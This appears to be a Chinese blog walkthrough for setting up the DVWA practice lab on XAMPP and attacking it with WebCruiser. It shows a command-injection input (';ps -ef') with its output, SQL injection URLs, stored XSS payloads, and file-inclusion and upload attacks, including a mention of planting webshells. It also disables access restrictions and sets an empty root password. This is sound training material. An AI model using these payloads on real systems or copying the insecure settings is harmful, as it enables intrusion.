【网络安全】DVWA和WebCruiser攻击演练过程详解
http://www.dvwa.co.uk/
https://www.apachefriends.org/zh_cn/index.html
2、安装xampp
./xampp.run根据提示进行安装即可,安装后目录为/opt/lampp
./xampp start
./sampp stop
启动后客户端机器远程使用IP地址无法访问xampp服务器(http://192.168.102.4/xampp),vi ./etc/extra/httpd-xampp.conf,注释掉下面的代码重启xampp即可
61 #<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
62 # Require local
63 # ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
64 #</LocationMatch>
看到主界面说明安装成功。
测试数据库连接:./bin目录下用mysql连接数据库
mysql -h localhost -u root
直接进入:执行如下语句成功即可看到数据库信息,说明xampp安装成功
show database();
3、安装dvwa直接解压到./htdocs目录即可,然后利用ip/dvwa目录访问,则提示数据库无法连接,按下面修改即可
vi htdocs/dvwa/config/config.inc.php将下面的密码信息去除改为空密码即可
16 $_DVWA = array();
17 $_DVWA[ ‘db_server‘ ] = ‘localhost‘;
18 $_DVWA[ ‘db_database‘ ] = ‘dvwa‘;
19 $_DVWA[ ‘db_user‘ ] = ‘root‘;
20 $_DVWA[ ‘db_password‘ ] = ‘‘;
4、进入登录界面http://192.168.102.4/dvwa,需要输入用户名和密码admin/password,将DVWA Security设置为low
5、windows下使用WebCruiser进行主要攻击验证
WebCruiser:http://www.moonsec.com/content/uploadfile/201410/92a41413629442.zip
a、brute force
暴力破解用户名密码为admin/password ,主要是利用post/get提交username和password数据进行暴力破解。
b、command execute
未对命令进行判断可以执行多条命令
输入:192.168.102.4;ps -ef
PING 192.168.102.4 (192.168.102.4) 56(84) bytes of data.
64 bytes from 192.168.102.4: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 192.168.102.4: icmp_seq=2 ttl=64 time=0.024 ms
64 bytes from 192.168.102.4: icmp_seq=3 ttl=64 time=0.036 ms
--- 192.168.102.4 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.019/0.026/0.036/0.008 ms
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 1月07 ? 00:00:36 /usr/lib/systemd/systemd --switched-root --system --deserialize 19
root 2 0 0 1月07 ? 00:00:00 [kthreadd]
root 3 2 0 1月07 ? 00:00:08 [ksoftirqd/0]
root 5 2 0 1月07 ? 00:00:00 [kworker/0:0H]
root 7 2 0 1月07 ? 00:00:08 [migration/0]
root 8 2 0 1月07 ? 00:00:00 [rcu_bh]
root 9 2 0 1月07 ? 00:11:38 [rcu_sched]
root 10 2 0 1月07 ? 00:00:44 [watchdog/0]
root 11 2 0 1月07 ? 00:00:28 [watchdog/1]
root 12 2 0 1月07 ? 00:00:06 [migration/1]
root 13 2 0 1月07 ? 00:00:08 [ksoftirqd/1]
root 15 2 0 1月07 ? 00:00:00 [kworker/1:0H]
root 16 2 0 1月07 ? 00:00:28 [watchdog/2]
root 17 2 0 1月07 ? 00:00:06 [migration/2]
root 18 2 0 1月07 ? 00:00:07 [ksoftirqd/2]
root 20 2 0 1月07 ? 00:00:00 [kworker/2:0H]
root 21 2 0 1月07 ? 00:00:27 [watchdog/3]
root 22 2 0 1月07 ? 00:00:06 [migration/3]
root 23 2 0 1月07 ? 00:00:13 [ksoftirqd/3]
root 25 2 0 1月07 ? 00:00:00 [kworker/3:0H]
root 26 2 0 1月07 ? 00:00:59 [watchdog/4]
root 27 2 0 1月07 ? 00:00:07 [migration/4]
root 28 2 0 1月07 ? 00:00:02 [ksoftirqd/4]
root 30 2 0 1月07 ? 00:00:00 [kworker/4:0H]
root 31 2 0 1月07 ? 00:02:46 [watchdog/5]
root 32 2 0 1月07 ? 00:00:08 [migration/5]
root 33 2 0 1月07 ? 00:00:02 [ksoftirqd/5]
root 35 2 0 1月07 ? 00:00:00 [kworker/5:0H]
c、Cross Site Request Forgery (CSRF)
没有对输入原密码验证直接判断两个密码是否相等后直接修改密码
d、File Inclusion
通过修改包含文件可以查看到相关文件信息
http://192.168.102.4/dvwa/vulnerabilities/fi/?page=include.php
e、SQL注入
http://192.168.102.4/dvwa/vulnerabilities/sqli/
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=99999999
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033
通过右键sql injection poc进入后可以查看数据库和表及数据信息如图1和2所示
同上面的SQL注入,SQL盲注技术就是一些攻击者使用的新技术,其在错误信息被屏蔽的情况下使攻击者仍能获得所需的信息,耗费时间较长。
g、跨站
一种是反射跨站,一种是存储跨站
反射:XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS
存储:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码
引用是来自其它网站或服务器的地址链接
http://192.168.102.4/dvwa/vulnerabilities/xss_s/^btnSign=Sign Guestbook&mtxMessage=WCRTEXTAREATESTINPUT9749323&txtName=3075018<img src=0 onerror="alert(7795171)">
输入<img src=0 onerror="alert(‘jhelloyhellohhello‘)">后存储到服务器上
还有一个Dom XSS:DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情
h、文件上传
通过上传的错误信息可以查看到文件上传的目录,如果上传成功可以上传小马和大马从而攻陷整个机器
Warning: move_uploaded_file(../../hackable/uploads/wenjin_crack.pcap): failed to open stream: Permission denied in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7
Warning: move_uploaded_file(): Unable to move ‘/opt/lampp/temp/php1FMFHK‘ to ‘../../hackable/uploads/wenjin_crack.pcap‘ in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。